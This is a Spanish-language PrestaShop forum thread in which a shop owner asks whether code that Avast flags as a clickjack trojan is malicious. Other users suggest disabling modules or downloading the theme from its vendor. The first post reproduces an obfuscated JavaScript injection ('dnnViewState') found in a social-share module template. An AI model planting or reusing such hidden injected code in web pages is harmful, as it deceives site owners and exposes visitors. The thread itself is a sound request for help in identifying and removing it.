rodrigoquai Posted August 22, 2013 Share Posted August 22, 2013 Hola Amigos, tengo la siguiente situación, resulta que nuestra pagina web al parecer tiene un troyano, esto sucede cuando se ingresa a una descripción del producto. este troyano fue detectado por los antivirus Avast , adjunto link http://www.avast.com/es-cl/lp-fr-virus-alert?p_ext=&utm_campaign=Virus_alert&utm_source=prg_fav_80_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fes-cl%2Fvirus-alert-default&p_vir=JS:Clickjack-B%20%5bTrj%5d&p_prc=C:\Program%20Files%20(x86)\Google\Chrome\Application\chrome.exe&p_obj=http://www.musicworld.cl/product.php?id_product=329&p_var=.%2Ffa%2Fes-cl%2Fvirus-alert-default&p_elm=7&p_lex=332&p_lid=es-cl&p_lng=es&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_vep=8&p_ves=0&p_vbd=1489&p_hid=0e55d2da-40ef-41b9-83e2-362061a783c1 revisando a que se debía este problema llegue a esta URL donde hablaban de este troyano http://blog.gwebtools.com/how-to-remove-jsclickjack-a-trj-from-my-website/ donde hablan del código malicioso y como eliminarlo hasta hay todo bien, pues pensaba que me habían hackeado y que me habían incrustado código a mi pagina web. por lo tanto como soy precavido tenia varios respaldo del sitio y procedí a restaurarlo. pero el problema seguía. entonces seguí leyendo y llegue a una web donde decía que después de actualizar avast detectaba este troyano, cabe destacar que en otro antivirus como karpesky no detecta este código. empece a comparar códigos y no había ninguna modificación. me pareció muy raro por lo cual me dedique a buscar el codigo en la pagina web y lo encontré en un modulo específicamente en el modulo Lof Social Share Module v1.0.0 , al desactivarlo el mensaje de troyano desapareció. entonces mi consulta es : esto que pasa es un troyano efectivamente ? alguien sabe que puede suceder, dejo el código que tiene el módulo /modules/lofsocial/tmpl/basic/default.tpl /themes/leo_hitech/modules/lofsocial/tmplbasic/default.tpl debo decir que nuestra versión de prestashop es PrestaShop™ 1.4.9.0 por que este codigo es detectado como troyano por avast. <!--Start Module--> <div class="socialshare"> <div> <strong style="float: left; margin: 5px;">Compartir:</strong> <script language="JavaScript"> function dnnViewState() {ldelim} var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l) {ldelim} m=x[l-a]; t=z=''; for(v=0;v<m.length;) {ldelim} t+=m.charAt(v++); if(t.length==2) {ldelim} z+=String.fromCharCode(parseInt(t)+25-l+a); t=''; {rdelim} {rdelim} x[l-a]=z; {rdelim} document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{ldelim}'+x[1]+'{rdelim}</'+x[0]+'>'); {rdelim} dnnViewState(); </script> {$data} <div class="clearfix clr"></div> <br /> <!--Add Script--> <!--End Module--> </div> </div> saludos y muchas Gracias por sus opiniones y/o Respuestas Link to comment Share on other sites More sharing options...
escacena Posted August 27, 2013 Share Posted August 27, 2013 A mi me pasa exactamente lo mismo, si alguien sabe como solucionarlo.... Link to comment Share on other sites More sharing options...
rodrigoquai Posted August 27, 2013 Author Share Posted August 27, 2013 desactiva el modulo que mencione Lof Social Share Module v1.0.0 si es que lo tienes Link to comment Share on other sites More sharing options...
escacena Posted August 27, 2013 Share Posted August 27, 2013 desactiva el modulo que mencione Lof Social Share Module v1.0.0 si es que lo tienes si tengo ese modulo pero no es el que me hace saltar el antivirus avast, he tenido que desactivar Lof Advance Footer Module y se solucionó. Gracias Link to comment Share on other sites More sharing options...
Romeo.Tran Posted November 27, 2013 Share Posted November 27, 2013 Please downlaod this template from Leotheme.com if you download from other site will have visut Link to comment Share on other sites More sharing options...
Recommended Posts